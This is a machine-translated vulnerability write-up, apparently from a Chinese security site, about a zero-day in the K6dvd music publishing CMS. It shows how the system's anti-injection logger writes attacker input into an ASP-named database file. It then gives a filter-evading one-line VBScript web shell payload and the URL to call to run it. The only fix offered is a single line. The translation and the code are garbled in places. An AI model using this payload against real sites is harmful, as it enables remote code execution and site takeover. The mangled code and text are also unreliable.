K6dvd music network program write horse 0day and repair

Koohik

K6dvd is a good music publishing Management System in China!

If you submit a URL with parameters, the return value is as follows:

Illegal operation! The system makes the following records:
Operation IP: xxx. xx
Operation Time: 19:33:47
Operation page:/yxplay. asp
Submission method: GET
Submit parameter: id
Submit data: 109446 ′

Well, anti-injection system! Most people who are engaged in penetration should have seen it ~

Oh, I also made an IP record ~~

I tried some common penetration ideas at Will ~ It is not satisfactory because of the blockage of the anti-injection system!

Therefore, I directly downloaded the music source code of the site to see if I could turn over the ODAY ~ So we have this article !!

Let's take a look at the injection prevention system, which exists in conn. asp and SQL. asp, as shown in the following section:

ASP/Visual Basic Code
Dim dbkillSql, killSqlconn, connkillSql
DbkillSql = "data/# SQL. asp"
'On Error Resume Next
Set killSqlconn = Server. CreateObject ("ADODB. Connection ")
ConnkillSql = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath (dbkillSql)
KillSqlconn. Open connkillSql

A database connection is created!
'--- POST section ------
If Request. Form <> "Then
For Each Fy_Post In Request. Form
For Fy_Xh = 0 To Ubound (Fy_Inf)
If Instr (LCase (Request. Form (Fy_Post), Fy_Inf (Fy_Xh) <> 0 Then
If WriteSql = True Then
Values. Execute ("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values ('" & Request. ServerVariables ("REMOTE_ADDR") & "', '" & Request

. ServerVariables ("URL") & "', 'post'," & Fy_Post & "', '" & replace (Request. form (Fy_Post ),"'",""")&"')")
KillSqlconn. close
Set killSqlconn = Nothing
End If
Response. Write "<Script Language = JavaScript> alert

, Please do not submit any illegal characters or parameter injection to this site! '); </Script>"
Response. Write "Invalid operation! The system has made the following records <br>"
Response. Write "Operation IP:" & Request. ServerVariables ("REMOTE_ADDR") & "<br>"
Response. Write "Operation Time:" & Now & "<br>"
Response. Write "Operation page:" & Request. ServerVariables ("URL") & "<br>"
Response. Write "submission method: POST <br>"
Response. Write "submit parameter:" & Fy_Post & "<br>"
Response. Write "submit data:" & Request. Form (Fy_Post)
Response. End
End If
 

Well, this is the alert error message!

Take a closer look and find an interesting guy.

ASP/Visual Basic Code
KillSqlconn. Execute ("insert into 9j455

(Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values ('"& Request. ServerVariables (" REMOTE_ADDR ")&"','"

& Request. serverVariables ("URL") & "', 'post'," & Fy_Post & "', '" & replace (Request. form (Fy_Post ),"'",""")&"')")
 

This is a normal record of the IP and action types, as well as the content submitted by the injector !!

Check whether the above Server. CreateObject ("ADODB. Connection") database is actually ASP... Then, if we submit '<% execute (request ("wooden") %>, wouldn't I write a sentence for us to # SQL. asp? Don't be too happy. Let's look at it again:

'Custom string to be filtered, separated by '|'
Fy_In = "'|; | and | exec | insert | select | delete | update | count | * | % | chr | mid | master | truncate | char | declare"

The keyword in the submit type is executed in the fy_in parameter! If these keywords appear in the submitted content,

Therefore, the database cannot be submitted!

If you have learned regular expressions, this is not a problem for JavaScript masters. It has been changed over and over again!

Finally, a Trojan that can skip all the above detection statements is born ~ It's just the pleasure of eval---No execute error!

<Script runat = server language = vbscript> eval request (chr (35) </script>

Method of exploits: and => <script runat = server language = vbscript> eval request (chr (35) </script>

Then access data/% 23sql. asp to execute a sentence.
Www.2cto.com solution: enhanced Filtering